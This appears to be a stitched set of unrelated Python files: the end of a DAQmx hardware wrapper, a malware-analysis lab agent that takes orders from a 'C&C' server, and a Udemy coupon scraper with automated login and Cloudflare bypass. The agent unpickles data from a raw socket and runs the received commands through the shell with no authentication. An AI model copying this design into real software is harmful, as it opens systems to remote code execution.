raise ValueError("Invalid counter channel selected")
if first_edge_type.lower() == "falling":
first_edge_type = DAQmx_Val_Falling
else:
first_edge_type = DAQmx_Val_Rising
if second_edge_type.lower() == "falling":
second_edge_type = DAQmx_Val_Falling
else:
second_edge_type = DAQmx_Val_Rising
self.tasks[ident] = TwoEdgeSeparation(
self.device_name,
counter_chan,
min_val,
max_val,
first_edge_type,
second_edge_type,
source_terminal,
destination_terminal,
)
def trigger_measurement(self, ident):
try:
self.tasks[ident].trigger()
except KeyError as e:
raise ValueError("{} is not a valid task".format(ident)) from e
def create_buffered_write(self, ident, frequency, *dio_ranges):
"""
Sets up the ranges to synchronize when writing to output at a specified frequency.
This will force each write to the output for this ident to contain the amount of samples specified.
eg.
>>>daq = DaqMx()
# Setup output @ 100Hz, 3 samples on port0 line 7 and 9
>>>daq.create_buffered_write("MyOutput", 100, (0, 7, 7), (0, 9, 9))
3 samples over 2 lines is 6 data values.
>>>daq["MyOutput"] = [0 ,0, 1, 1, 0, 1]
it is interleaved so it is written [line7, line9, line7, line9, line7, line9]
Requires ports that enable buffered writes.
In the X-Series daq this is port 0
This disables reading from the output port for these pins.
:param ident
The identification used to access this message
:param frequency
The sample frequency for writing
:type frequency integer or float
:param io_ranges
:type (port, line_start, line_end)
:param samples
The amount of samples that are required for each digital output write
"""
if ident in self.tasks:
raise ParameterError("Ident {} already used".format(ident))
do_channel, data_length = self._build_digital_task_string(*dio_ranges)
self.tasks[ident] = BufferedWrite(
task_string=do_channel, io_length=data_length, frequency=frequency
)
def _build_digital_task_string(self, *dio_ranges):
"""
:param dio_ranges:
each dio_range is a tuple of ('port', 'range_start', 'range_end') or an IORange instance.
:return:
The string used to create the task by connecting each of the ports togeter
"""
data_length = 0
task_arr = []
for rng in dio_ranges:
task_arr.append(self.device_name + "/port{}/line{}:{}".format(*rng))
data_length += rng[2] - rng[1] + 1 # range end - range start + 1
return ", ".join(task_arr).encode(), data_length
def create_digital_output(self, ident, *dio_ranges):
"""
:param dio_ranges
each dio_range is a tuple of ('port', 'range_start', 'range_end') or an IORange instance.
A digital output is created in the order of the dio_ranges and can be accessed by the ident key.
>>>daq = DaqMx()
>>>rng_1 = IORange(0, 7, 9) # Port 0 line 7 to line 9
>>>rng_2 = IORange(0, 11,11) # Port 0 line 11
>>>daq.create_digital_output("MyOut", rng_1, rng_2)
>>>daq["MyOut"] = [0, 1, 0, 1] # Port 0 Line 8 and 11 high
>>>print(daq["MyOut"]) # Read back the value
>>>[0, 1, 0, 1]
"""
if ident in self.tasks:
raise ParameterError("Ident {} already used".format(ident))
task_string, data_length = self._build_digital_task_string(*dio_ranges)
self.tasks[ident] = DigitalOut(task_string, io_length=data_length)
def create_digital_input(self, ident, *dio_ranges):
"""
:param dio_ranges
each dio_range is a tuple of ('port', 'range_start', 'range_end') or an IORange instance.
A digital output is created in the order of the dio_ranges and can be accessed by the ident key.
>>>daq = DaqMx()
>>>rng_1 = IORange(0, 7, 9) # Port 0 line 7 to line 9
>>>rng_2 = IORange(0, 11,11) # Port 0 line 11
>>>daq.create_digital_input("MyOut", rng_1, rng_2)
>>>print(daq["MyOut"]) # Tie Port 0 line 8 and line 11 high
>>>[0, 1, 0, 1]
"""
if ident in self.tasks:
raise ParameterError("Ident {} already used".format(ident))
task_string, data_length = self._build_digital_task_string(*dio_ranges)
self.tasks[ident] = DigitalIn(task_string, io_length=data_length)
def __getitem__(self, ident):
return self.read(ident)
def __setitem__(self, ident, data):
self.write(ident, data)
def write(self, ident, value):
try:
return self.tasks[ident].write(value)
except KeyError:
raise KeyError("{} is not a valid identifier".format(ident))
def read(self, ident):
try:
return self.tasks[ident].read()
except KeyError:
raise KeyError(
"{} is not a valid identifier\nAvailable tasks: {}".format(
ident, sorted(self.tasks)
)
)
def start_task(self, ident):
"""
:param ident:
:return:
"""
self.tasks[ident].start()
def stop_task(self, ident):
"""
Stops a task to be
:param ident:
:return:
"""
self.tasks[ident].stop()
def clear_task(self, ident):
"""
Stops a task and clear up the resources allocated to the
:param ident:
:return:
"""
self.tasks[ident].clear()
|
agent.py
|
import shutil
import socket
import subprocess
import threading
import json
import pickle
import tempfile
import time
import box
import threading
import os
import base64
import getpass
import urllib
import requests
import zipfile
import sys
import pprint
import platform
DEBUG = True
BPH_TEMPLATE_SERVER_IP = sys.argv[1]
BPH_TEMPLATE_SERVER_PORT = int(sys.argv[2])
BPH_CONTROLLER_WEB_PORT = int(sys.argv[3])
running_os = platform.release()
if running_os == "7":
APP_DATA = "C:\\Users\\{current_user}\\AppData\\Roaming\\".format(
current_user=getpass.getuser())
TMP_FOLDER = "C:\\Users\\{current_user}\\AppData\\Local\\Temp\\".format(
current_user=getpass.getuser())
elif running_os == "XP":
# To avoid tool issues when dealing with white-spaced paths.
APP_DATA = "C:\\DOCUME~1\\{current_user}\\APPLIC~1\\".format(
current_user=getpass.getuser())
TMP_FOLDER = "C:\\DOCUME~1\\{current_user}\\LOCALS~1\\Temp\\".format(
current_user=getpass.getuser())
else:
print "Unsupported platform! Exiting..."
sys.exit()
class FilterSpecialVars():
def __init__(self, unfiltered_data, template=None, custom_user_vars=None):
# unfiltered_data should be a list
self.unfiltered_data = unfiltered_data
self.filtered_data = []
self.special_vars = {
'@appdata@': APP_DATA, # os.path.expandvars('%appdata%'),
'@temp@': TMP_FOLDER,
'@toolname@': template['tool_name'], # "peid"
'@filename@': template.tool.filename, # "peid.exe"
'@rid@': template['rid'],
'@md5@': template['md5'],
'@sample@': "\"" + ExecutionManager.sample_abs_path + "\"",
'@sample_filename@': "\"" + os.path.basename(ExecutionManager.sample_abs_path) + "\"",
'@tool_drive@': template['tool_drive'],
'@tool_path@': os.path.join(template['tool_drive'], template['remote_tool_path'].replace('/','\\')),
'@tool_abs_path@': os.path.join(template['tool_drive'], template['remote_tool_path'],
template.tool.filename),
'@report_folder@': os.path.join(APP_DATA, template['rid'], template['tool_name'])
}
if custom_user_vars != None:
self.custom_user_vars_filter(custom_user_vars)
def custom_user_vars_filter(self, custom_user_vars):
if DEBUG: print "Custom User Vars Filtering: {}".format(custom_user_vars)
for k, v in custom_user_vars.items():
key = "@{}@".format(k)
self.special_vars.update({key: v})
if DEBUG: print self.special_vars
def filter_now(self):
def do_filter(unfiltered_string):
for k, v in self.special_vars.items():
if k in str(unfiltered_string):
unfiltered_string = unfiltered_string.replace(k, v)
if DEBUG: print ">> Found: {}".format(unfiltered_string)
return unfiltered_string
for unfiltered_string in self.unfiltered_data:
if len(unfiltered_string) != 0:
if DEBUG: print "### Searching Variable ###: {}".format(unfiltered_string)
self.filtered_data.append(do_filter(unfiltered_string))
if DEBUG: print self.special_vars
if DEBUG:
print"FILTERED: {}".format(self.filtered_data)
# return " ".join(self.filtered_data)
class File(object):
def __init__(self):
pass
def generate_random_file_name(self):
import string
import random
return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(0, 10))
def zip_file(self, file_abs_path, seconds=5):
if not file_abs_path.endswith('.log') and not file_abs_path.endswith('.zip'):
if DEBUG: print "Creating compressed (zip) archive: {}".format(file_abs_path)
#time.sleep(5)
try:
zip_filename = "{}.zip".format(os.path.basename(file_abs_path))
if DEBUG: print zip_filename
original_filename = os.path.basename(file_abs_path)
if DEBUG: print original_filename
path_location = os.path.dirname(file_abs_path)
if DEBUG: print path_location
zip_file_abs_path = "{}\\{}".format(path_location, zip_filename)
if DEBUG: print zip_file_abs_path
zf = zipfile.ZipFile(zip_file_abs_path, 'w', zipfile.ZIP_DEFLATED)
# When a file is bein created as compressed file (zip), in some cases
# the set delay time is not enough and file-access errors appears.
# To avoid such situation, several attempts are made until the access
# to the source file is ready.
try:
zf.write(file_abs_path, os.path.basename(file_abs_path))
except IOError:
if DEBUG: print "Target file is still in use... attempting in ({}) seconds".format(seconds)
time.sleep(seconds)
self.zip_file(file_abs_path)
else:
if DEBUG: print "Zip file creation - Done."
except OSError as e:
if DEBUG: print "Error when setting up info for target zip file: {}".format(e)
raise
else:
zipfile.ZIP_DEFLATED
if os.path.isfile(zip_file_abs_path):
if DEBUG: print "Zip file ok: {}".format(zip_file_abs_path)
# os.remove(file_abs_path)
return zip_filename
else:
if DEBUG: print "Zip file can't be created"
return None
class AutoItScript(File):
def __init__(self, automation_data):
self.autoit_script = None
self.__base64totmp(automation_data)
def __base64totmp(self, automation_data):
if DEBUG: print "Converting from base64 file data to Auto-it Script"
tmp_au_script_abs_path = os.path.join(
APP_DATA, self.generate_random_file_name())
with open(tmp_au_script_abs_path, 'w+') as tmp_au_script:
for _ in automation_data:
if DEBUG: print "Writing: {}\n".format(_)
tmp_au_script.write(_)
self.autoit_script = tmp_au_script_abs_path
class DownloadedFile(File):
def __init__(self, download_url):
self.download_dir = APP_DATA
self.fake_file_name = self.generate_random_file_name()
self.original_file_name = os.path.basename(download_url)
self.extension = os.path.splitext(download_url)[1].replace('.', '')
#self.abs_path = os.path.join(self.download_dir, "{}.{}".format(
# self.fake_file_name, self.extension))
self.abs_path = os.path.join(self.download_dir, self.original_file_name)
if DEBUG:
print self.abs_path
class ExecutionManager(object):
report_path = ""
sample_abs_path = ""
#### Agent Command Control ######
def execute_tool(self, **cmd_data):
if DEBUG:
print cmd_data
tool_drive = cmd_data['tool_drive']
tool_path = cmd_data['tool_path'].replace('/', '\\')
tool_name = cmd_data['tool_name']
tool_abs_path = "\"{tool_drive}{tool_path}\\{tool_name}\"".format(
tool_drive=tool_drive,
tool_path=tool_path,
tool_name=tool_name,
)
if DEBUG:
print tool_abs_path
tool_args = cmd_data['tool_args']
if DEBUG:
print tool_args
cmd = "{} {}".format(tool_abs_path, tool_args)
if DEBUG:
print cmd
print "\nExecuting Cmd: {}\n".format(cmd)
subprocess.call(cmd, shell=True)
def exec_manager(self, **cmd_data):
if DEBUG:
if DEBUG: print "\nExecuting Thread with data: {}\n".format(cmd_data)
thread_name = cmd_data['tool_name']
thread = threading.Thread(target=self.execute_tool, name=thread_name, kwargs=cmd_data)
thread.start()
def write_tmp_file(self, datatowrite, sample_abs_path):
try:
if DEBUG: print "Writing Tmp file: {}".format(sample_abs_path)
with open(sample_abs_path, 'wb+') as f:
f.write(datatowrite)
except:
if DEBUG: print "Error while creating the tmp file."
else:
if DEBUG: print "Done."
if os.path.isfile(sample_abs_path):
if DEBUG: print "Temp file created correctly."
# Destination folder is created this way because because
# some tools shows weird behaviors when passing arguments
# For instance, CFF Explorer does not work correctly when
# the file agument resides on a directory with whitespaces.
# The workaround is to use DOS version of the path.
#fixed_sample_abs_path = sample_abs_path.split('\\')
#fixed_sample_abs_path[1] = "docume~1"
#fixed_sample_abs_path[3] = "applic~1"
# print fixed_sample_abs_path
# Setting up Class attribute for sample path
return sample_abs_path
return False
def download_file(self, download_url):
if DEBUG: print "Downloading: {}".format(download_url)
try:
import urllib2
filedata = urllib2.urlopen(download_url)
except urllib2.URLError:
if DEBUG: print "Can't download the target sample file. Make sure BPH Webserver is running on the host."
return False
else:
datatowrite = filedata.read()
sample_abs_path = DownloadedFile(download_url).abs_path
# Used when filtering custom variables
ExecutionManager.sample_abs_path = sample_abs_path
if DEBUG: print "Downloaded file: {}".format(sample_abs_path)
return self.write_tmp_file(datatowrite, sample_abs_path)
def execute_autoit_script(self, template, auto_it_script_abs_path):
# The previously generated AutoIT script will be executed.
if DEBUG: print "Executing Auto-It script"
self.exec_manager(
tool_drive=template.tool_drive,
tool_path='misc\\autoitv3\\',
tool_name='AutoIt3.exe',
tool_args=auto_it_script_abs_path)
def tool_execution(self, template):
def selected_execution(filtered_parameters, filtered_automation):
cascade_execution = False
if filtered_parameters is not None and filtered_automation is not None:
if DEBUG: print "Cascaded Execution Detected: parameters -> autoit"
cascade_execution = True
if filtered_parameters is not None:
if DEBUG: print "Parameter Execution Detected"
self.exec_manager(
tool_drive=template.tool_drive,
tool_path=template.remote_tool_path,
tool_name=template.tool.filename,
tool_args=filtered_parameters
)
if filtered_automation is not None:
# If cascase execution is set, then a delay between tool execution
# and automation is also set. This to allow the tool to properly
# load and the automation be able to run properly. A default value
# of 5 seconds was given.
if cascade_execution:
if DEBUG: print "Cascade Execution Delay - Running now..."
time.sleep(5)
if DEBUG: print "Automation-Only Execution Detected"
custom_user_vars = template.configuration.execution.custom_user_vars
auto_it_script_abs_path = AutoItScript(filtered_automation).autoit_script
self.execute_autoit_script(template, auto_it_script_abs_path)
def filter_custom_vars(template, filter_type=None):
# Handling template parameters custom vars
if filter_type is not None:
custom_user_vars = template.configuration.execution.custom_user_vars
if filter_type == "parameters":
parameters = template.actions[template.actions.action]['parameters']
if parameters is not None:
if DEBUG: print "Parameters: {}".format(parameters)
if len(custom_user_vars) != 0:
if DEBUG: print "Custom Parameters Vars {} - Parameters({})".format(custom_user_vars, parameters)
filtered_parameters = self.filter_variables(
parameters, template, filter_type='parameters', custom_user_vars=custom_user_vars)
else:
filtered_parameters = self.filter_variables(
parameters, template, filter_type='parameters', custom_user_vars=None)
return filtered_parameters
if filter_type == "automation":
automation = template.actions[template.actions.action]['automation']
if automation is not None:
if DEBUG: print "Automation: {}".format(automation)
if len(custom_user_vars) != 0:
if DEBUG: print "Custom Automation Vars {}".format(custom_user_vars)
filtered_automation = self.filter_variables(
automation, template, filter_type='automation', custom_user_vars=custom_user_vars)
else:
filtered_automation = self.filter_variables(
automation, template, filter_type='automation', custom_user_vars=None)
return filtered_automation
action_name = template.actions.action
if DEBUG: print "Executing: {}".format(action_name)
filtered_parameters = filter_custom_vars(template, filter_type='parameters')
filtered_automation = filter_custom_vars(template, filter_type='automation')
selected_execution(filtered_parameters, filtered_automation)
class TemplateManager(ExecutionManager):
def __init__(self, template):
# self.report_directory_check(template.vm_report_name)
if DEBUG: print "#"*50
if DEBUG: print dict(template)
if DEBUG: print "#"*50
# Each tool request must save files. Those can be either a log file
# or output files from its execution. This "report path" folder will
# be created per request.
#
# The /files/ folder will be used to store any additional files generated
# by the tool.
self.report_path_files = os.path.join(
APP_DATA, template.rid, template.tool_name, 'files')
self.report_path = os.path.join(
APP_DATA, template.rid, template.tool_name)
if not os.path.isdir(self.report_path_files):
if DEBUG: print "Creating: {}".format(self.report_path_files)
os.makedirs(self.report_path_files)
if template.configuration.execution['download_sample']:
self.download_file(template.download_url)
# Tool execution will eventually select which execution type will be run,
# either automated or manual (only based in parameters)
self.tool_execution(template)
# Delay (seconds) between tool executions.
exec_delay = template.configuration.execution.delay
if DEBUG: print "Execution Delay (in seconds): {}".format(exec_delay)
time.sleep(exec_delay)
while True:
if DEBUG: print threading.active_count()
if DEBUG: print threading.enumerate()
threads = str(threading.enumerate()).lower()
if template.configuration.execution.background_run:
if DEBUG: print "TOOL DOES RUN IN BACKGROUND..."
if template.tool.filename.lower() in threads:
# FIXED: This allows more than one tool running in background
if threading.active_count() != 1:
if "autoit" not in threads:
if DEBUG: print "TOOL RUN CHECK DONE"
break
else:
if DEBUG: print "TOOL DOES NOT RUN IN BACKGROUND..."
if template.tool.filename.lower() not in threads:
if "autoit" not in threads:
if DEBUG: print "TOOL RUN CHECK - DONE"
break
time.sleep(1)
if DEBUG: print "\n###### Tool execution has ended #######\n"
if DEBUG: print threading.active_count()
if DEBUG: print threading.enumerate()
if template.configuration.reporting.report_files:
if DEBUG: print "########## Starting COLLECTING HTTP FILES ##############"
self.report(template)
def filter_variables(self, data, template, filter_type=None, custom_user_vars=None):
if filter_type == "parameters":
# Convert into list here.
data = data.split(' ')
if filter_type == "automation":
# Decode first, then convert into a list.
data = base64.decodestring(data).split('\n')
if DEBUG: print "Filtering Variables: {}".format(data)
unfiltered_data = FilterSpecialVars(data, template=template, custom_user_vars=custom_user_vars)
unfiltered_data.filter_now()
if DEBUG: print "Filtered Args: ({})".format(unfiltered_data.filtered_data)
if filter_type == "parameters":
return " ".join(unfiltered_data.filtered_data)
if filter_type == "automation":
return unfiltered_data.filtered_data
def report_back(self, report_data):
url = "http://{}:{}/bph/report.php".format(BPH_TEMPLATE_SERVER_IP, BPH_CONTROLLER_WEB_PORT)
files = {'file': open(report_data['file_abs_path'], 'rb')}
response = requests.post(url, data={'project_name': report_data['project_name'],
'md5': report_data['md5'],
'sid': report_data['sid'],
'tool': report_data['tool_name'],
'rid': report_data['rid'],
'file': report_data['file'],
'dir': report_data['dir']}, files=files)
if DEBUG: print "Response: {}".format(response.text)
def report_files(self, base_folder, tool_name):
if DEBUG: print "Searching files in: {} - tool: {}".format(base_folder, tool_name)
while True:
if len(os.listdir(base_folder)) != 0:
if DEBUG: print "Files found.. Collecting them now..."
files_found = []
for root, dirs, files in os.walk(base_folder):
for file in files:
full_path = os.path.join(root, file)
if DEBUG: print "FullPath: {}".format(full_path)
file_name = os.path.basename(full_path)
if DEBUG: print "FileName: {}".format(file_name)
index = full_path.split('\\').index(tool_name)
if DEBUG: print "Index: {}".format(index)
path_found = "/".join([x for x in full_path.split('\\')[index+1:]])
if DEBUG: print "PathFound: {}".format(path_found)
if path_found.count('/') == 0:
# Tool log file was found (e.g. bintext.log)
if DEBUG: print "Found log file: {}".format(path_found)
if path_found.endswith('.log'):
if DEBUG: print "FullPath: {}".format(full_path)
file_and_path_found = [full_path, path_found, '/']
files_found.append(file_and_path_found)
else:
# Any file inside of the /files/ folder.
if DEBUG: print "Found non-log file: {}".format(path_found)
# For non-log files, a file version of the file will be generated
# due problems of uploading big files through HTTP. This is a temporary fix.
zip_filename = File().zip_file(full_path)
file_and_path_found = zip_filename.split() + \
path_found.split('/')[:-1]
if DEBUG: print file_and_path_found
file_and_path_found.insert(
0, full_path.replace(file_name, zip_filename))
if file_and_path_found not in files_found:
if DEBUG: print "Appending file found: {}".format(file_and_path_found)
files_found.append(file_and_path_found)
if DEBUG: print "FullPathFound: {}".format(file_and_path_found)
if DEBUG: print "Files Found: {}".format(files_found)
return list(files_found)
else:
if DEBUG: print "Waiting for files to appear..."
time.sleep(1)
def report(self, template):
def filter_dir(unfiltered_dir):
if DEBUG: print "Unfiltered dir: {}".format(unfiltered_dir)
dir_path = "/".join(unfiltered_dir)
if dir_path.startswith('/'):
return unfiltered_dir[0]
return "/{}".format(dir_path)
report_data = {}
if os.path.isdir(self.report_path):
if DEBUG: print "Sending back results to C&C server..."
# Request variables. Generate data on the server.
report_data['project_name'] = template.project_name
report_data['md5'] = template.md5
report_data['sid'] = template.sid
report_data['rid'] = template.rid
report_data['tool_name'] = template.tool_name
for file_found in self.report_files(self.report_path,
template.tool_name):
# if DEBUG: print "FileFound: {}".format(file_found)
report_data['file_abs_path'] = file_found[0]
report_data['file'] = urllib.quote(file_found[1], safe='')
report_data['dir'] = filter_dir(file_found[2:])
if DEBUG: print report_data
self.report_back(report_data)
if DEBUG: print "Done."
else:
if DEBUG: print "Report Directory ({}) does not exist".format(self.report_path)
def report_directory_check(self, vm_report_name):
report_path = os.path.join(APP_DATA, vm_report_name)
if DEBUG:
print report_path
if not os.path.isdir(report_path):
os.mkdir(report_path)
self.report_directory_check()
else:
REPORT_PATH = report_path
class Agent:
RETRY_SECS = 1
BUFFER_SIZE = 16384
def __init__(self):
self.connection_status = False
#### Agent Control Functions ####
def start(self):
print "Starting Agent..."
# Connect to Server
self.connect()
def stop(self):
print "Stopping Agent..."
self.disconnect()
self.connection_status = False
def restart(self):
self.stop()
self.start()
#### Agent Connection Functions ####
def check_connection(self):
pass
# print dir(self._clientsocket)
def is_connected(self):
if self.connection_status == True:
return True
return False
def send(self, data):
print "Sending Data: {}".format(data)
try:
self._clientsocket.send(data)
except:
self.reconnect()
def listen(self):
print "Connected to C&C Template Server. Waiting for instructions..."
try:
while True:
# Keeps running receiving data. Once received
# it its automatically un-serialized and converted
# into an Python dictionary object.
serialized_data = pickle.loads(self._clientsocket.recv(self.BUFFER_SIZE))
template_data = box.Box(serialized_data)
# TemplateManager decomposes serialized data
# and take actions to execute the selected program
TemplateManager(template_data)
print "Sending back to C&C => OK status"
self.send('ok')
except socket.error as e:
print "Server disconnection: {}".format(e)
self.reconnect()
except EOFError as e:
print "Server disconnection...".format(e)
self.reconnect()
else:
# If template data was received correctly, then acknowledge.
self.send('skip')
def connect(self):
# Make the connection to the server
print "Connecting to C&C Template Server: {}:{}".format(BPH_TEMPLATE_SERVER_IP, BPH_TEMPLATE_SERVER_PORT)
try:
# Initialize Socket & connect back to server.
self._clientsocket = socket.socket()
self._clientsocket.connect((BPH_TEMPLATE_SERVER_IP, BPH_TEMPLATE_SERVER_PORT))
self._clientsocket.setblocking(1)
except socket.error:
self.reconnect()
except KeyboardInterrupt:
print "Interrupting execution."
sys.exit()
else:
print "Connection established. "
self.connection_status = True
self.listen()
def disconnect(self):
self._clientsocket.close()
def reconnect(self):
print "Reconnecting...."
if DEBUG: print "Connection Error. Server down? Attempting connection in: ({}) seconds".format(self.RETRY_SECS)
time.sleep(self.RETRY_SECS)
if DEBUG: print "Attempting now..."
self.connect()
if __name__ == "__main__":
agent = Agent()
try:
agent.start()
while True:
# agent.check_connection()
if not agent.is_connected():
# If agent stops. Start it again.
agent.start()
except KeyboardInterrupt:
print "Manual interruption. Bye!"
sys.exit()
|
duce.py
|
import json
import os
import random
import re
import threading
import time
import traceback
from decimal import Decimal
from urllib.parse import parse_qs, unquote, urlsplit
import cloudscraper
import requests
from bs4 import BeautifulSoup as bs
from tqdm import tqdm
from colors import *
# DUCE-CLI
# Scraper
def discudemy():
global du_links
du_links = []
big_all = []
head = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 Edg/89.0.774.77",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
}
for page in range(1, 4):
r = requests.get("https://www.discudemy.com/all/" + str(page), headers=head)
soup = bs(r.content, "html5lib")
small_all = soup.find_all("a", {"class": "card-header"})
big_all.extend(small_all)
du_bar = tqdm(total=len(big_all), desc="Discudemy")
for index, item in enumerate(big_all):
du_bar.update(1)
title = item.string
url = item["href"].split("/")[4]
r = requests.get("https://www.discudemy.com/go/" + url, headers=head)
soup = bs(r.content, "html5lib")
du_links.append(title + "|:|" + soup.find("a", id="couponLink").string)
du_bar.close()
def udemy_freebies():
global uf_links
uf_links = []
big_all = []
for page in range(1, 3):
r = requests.get(
"https://www.udemyfreebies.com/free-udemy-courses/" + str(page)
)
soup = bs(r.content, "html5lib")
small_all = soup.find_all("a", {"class": "theme-img"})
big_all.extend(small_all)
uf_bar = tqdm(total=len(big_all), desc="Udemy Freebies")
for index, item in enumerate(big_all):
uf_bar.update(1)
title = item.img["alt"]
link = requests.get(
"https://www.udemyfreebies.com/out/" + item["href"].split("/")[4]
).url
uf_links.append(title + "|:|" + link)
uf_bar.close()
def tutorialbar():
global tb_links
tb_links = []
big_all = []
for page in range(1, 4):
r = requests.get("https://www.tutorialbar.com/all-courses/page/" + str(page))
soup = bs(r.content, "html5lib")
small_all = soup.find_all(
"h3", class_="mb15 mt0 font110 mobfont100 fontnormal lineheight20"
)
big_all.extend(small_all)
tb_bar = tqdm(total=len(big_all), desc="Tutorial Bar")
for index, item in enumerate(big_all):
tb_bar.update(1)
title = item.a.string
url = item.a["href"]
r = requests.get(url)
soup = bs(r.content, "html5lib")
link = soup.find("a", class_="btn_offer_block re_track_btn")["href"]
if "www.udemy.com" in link:
tb_links.append(title + "|:|" + link)
tb_bar.close()
def real_discount():
global rd_links
rd_links = []
big_all = []
for page in range(1, 3):
r = requests.get("https://real.discount/stores/Udemy?page=" + str(page))
soup = bs(r.content, "html5lib")
small_all = soup.find_all("div", class_="col-xl-4 col-md-6")
big_all.extend(small_all)
rd_bar = tqdm(total=len(big_all), desc="Real Discount")
for index, item in enumerate(big_all):
rd_bar.update(1)
title = item.a.h3.string
url = "https://real.discount" + item.a["href"]
r = requests.get(url)
soup = bs(r.content, "html5lib")
link = soup.find("div", class_="col-xs-12 col-md-12 col-sm-12 text-center").a[
"href"
]
if link.startswith("http://click.linksynergy.com"):
link = parse_qs(link)["RD_PARM1"][0]
rd_links.append(title + "|:|" + link)
rd_bar.close()
def coursevania():
global cv_links
cv_links = []
r = requests.get("https://coursevania.com/courses/")
soup = bs(r.content, "html5lib")
nonce = json.loads(
[
script.string
for script in soup.find_all("script")
if script.string and "load_content" in script.string
][0].strip("_mlv = norsecat;\n")
)["load_content"]
r = requests.get(
"https://coursevania.com/wp-admin/admin-ajax.php?&template=courses/grid&args={%22posts_per_page%22:%2230%22}&action=stm_lms_load_content&nonce="
+ nonce
+ "&sort=date_high"
).json()
soup = bs(r["content"], "html5lib")
small_all = soup.find_all("div", {"class": "stm_lms_courses__single--title"})
cv_bar = tqdm(total=len(small_all), desc="Course Vania")
for index, item in enumerate(small_all):
cv_bar.update(1)
title = item.h5.string
r = requests.get(item.a["href"])
soup = bs(r.content, "html5lib")
cv_links.append(
title + "|:|" + soup.find("div", {"class": "stm-lms-buy-buttons"}).a["href"]
)
cv_bar.close()
def idcoupons():
global idc_links
idc_links = []
big_all = []
for page in range(1, 6):
r = requests.get(
"https://idownloadcoupon.com/product-category/udemy-2/page/" + str(page)
)
soup = bs(r.content, "html5lib")
small_all = soup.find_all("a", attrs={"class": "button product_type_external"})
big_all.extend(small_all)
idc_bar = tqdm(total=len(big_all), desc="IDownloadCoupons")
for index, item in enumerate(big_all):
idc_bar.update(1)
title = item["aria-label"]
link = unquote(item["href"])
if link.startswith("https://ad.admitad.com"):
link = parse_qs(link)["ulp"][0]
elif link.startswith("https://click.linksynergy.com"):
link = parse_qs(link)["murl"][0]
idc_links.append(title + "|:|" + link)
idc_bar.close()
def enext() -> list:
en_links = []
r = requests.get("https://e-next.in/e/udemycoupons.php")
soup = bs(r.content, "html5lib")
big_all = soup.find("div", {"class": "scroll-box"}).find_all("p", {"class": "p2"})
en_bar = tqdm(total=len(big_all), desc="E-next")
for i in big_all:
en_bar.update(1)
title = i.text[11:].strip().removesuffix("Enroll Now free").strip()
link = i.a["href"]
en_links.append(title + "|:|" + link)
en_bar.close()
# Constants
version = "v1.6"
def create_scrape_obj():
funcs = {
"Discudemy": threading.Thread(target=discudemy, daemon=True),
"Udemy Freebies": threading.Thread(target=udemy_freebies, daemon=True),
"Tutorial Bar": threading.Thread(target=tutorialbar, daemon=True),
"Real Discount": threading.Thread(target=real_discount, daemon=True),
"Course Vania": threading.Thread(target=coursevania, daemon=True),
"IDownloadCoupons": threading.Thread(target=idcoupons, daemon=True),
"E-next": threading.Thread(target=enext, daemon=True),
}
return funcs
################
def cookiejar(
client_id,
access_token,
csrf_token,
):
cookies = dict(
client_id=client_id,
access_token=access_token,
csrf_token=csrf_token,
)
return cookies
def load_settings():
try:
with open("duce-cli-settings.json") as f:
settings = json.load(f)
except FileNotFoundError:
settings = requests.get(
"https://raw.githubusercontent.com/techtanic/Discounted-Udemy-Course-Enroller/master/duce-cli-settings.json"
).json()
title_exclude = "\n".join(settings["title_exclude"])
instructor_exclude = "\n".join(settings["instructor_exclude"])
try:
settings["languages"]["Russian"]
except KeyError:
settings["languages"]["Russian"] = True
settings.setdefault("save_txt", True) # v1.3
settings["sites"].setdefault("E-next", True) # v1.4
settings.setdefault("discounted_only", False) # v1.4
return settings, instructor_exclude, title_exclude
def save_settings():
with open("duce-cli-settings.json", "w") as f:
json.dump(settings, f, indent=4)
def get_course_id(url):
r = requests.get(url, allow_redirects=False)
if r.status_code in (404, 302, 301):
return False
if "/course/draft/" in url:
return False
soup = bs(r.content, "html5lib")
try:
courseid = soup.find(
"div",
attrs={"data-content-group": "Landing Page"},
)["data-course-id"]
except:
courseid = soup.find(
"body", attrs={"data-module-id": "course-landing-page/udlite"}
)["data-clp-course-id"]
# with open("problem.txt","w",encoding="utf-8") as f:
# f.write(str(soup))
return courseid
def get_course_coupon(url):
query = urlsplit(url).query
params = parse_qs(query)
try:
params = {k: v[0] for k, v in params.items()}
return params["couponCode"]
except:
return ""
def affiliate_api(courseid):
r = s.get(
"https://www.udemy.com/api-2.0/courses/"
+ courseid
+ "/?fields[course]=locale,primary_category,avg_rating_recent,visible_instructors",
).json()
instructor = (
r["visible_instructors"][0]["url"].removeprefix("/user/").removesuffix("/")
)
return (
r["primary_category"]["title"],
r["locale"]["simple_english_title"],
round(r["avg_rating_recent"], 1),
instructor,
)
def course_landing_api(courseid):
r = s.get(
"https://www.udemy.com/api-2.0/course-landing-components/"
+ courseid
+ "/me/?components=purchase"
).json()
try:
purchased = r["purchase"]["data"]["purchase_date"]
except:
purchased = False
try:
amount = r["purchase"]["data"]["list_price"]["amount"]
except:
print(r["purchase"]["data"])
return purchased, Decimal(amount)
def remove_duplicates(l):
l = l[::-1]
for i in l:
while l.count(i) > 1:
l.remove(i)
return l[::-1]
def update_available():
if version.removeprefix("v") < requests.get(
"https://api.github.com/repos/techtanic/Discounted-Udemy-Course-Enroller/releases/latest"
).json()["tag_name"].removeprefix("v"):
print(by + fr + " Update Available ")
else:
return
def check_login(email, password):
for retry in range(0, 2):
s = cloudscraper.CloudScraper()
r = s.get(
"https://www.udemy.com/join/signup-popup/",
)
soup = bs(r.text, "html5lib")
csrf_token = soup.find("input", {"name": "csrfmiddlewaretoken"})["value"]
data = {
"csrfmiddlewaretoken": csrf_token,
"locale": "en_US",
"email": email,
"password": password,
}
s.headers.update({"Referer": "https://www.udemy.com/join/signup-popup/"})
try:
r = s.post(
"https://www.udemy.com/join/login-popup/?locale=en_US",
data=data,
allow_redirects=False,
)
except cloudscraper.exceptions.CloudflareChallengeError:
continue
if r.status_code == 302:
cookies = cookiejar(
r.cookies["client_id"], r.cookies["access_token"], csrf_token
)
head = {
"authorization": "Bearer " + r.cookies["access_token"],
"accept": "application/json, text/plain, */*",
"x-requested-with": "XMLHttpRequest",
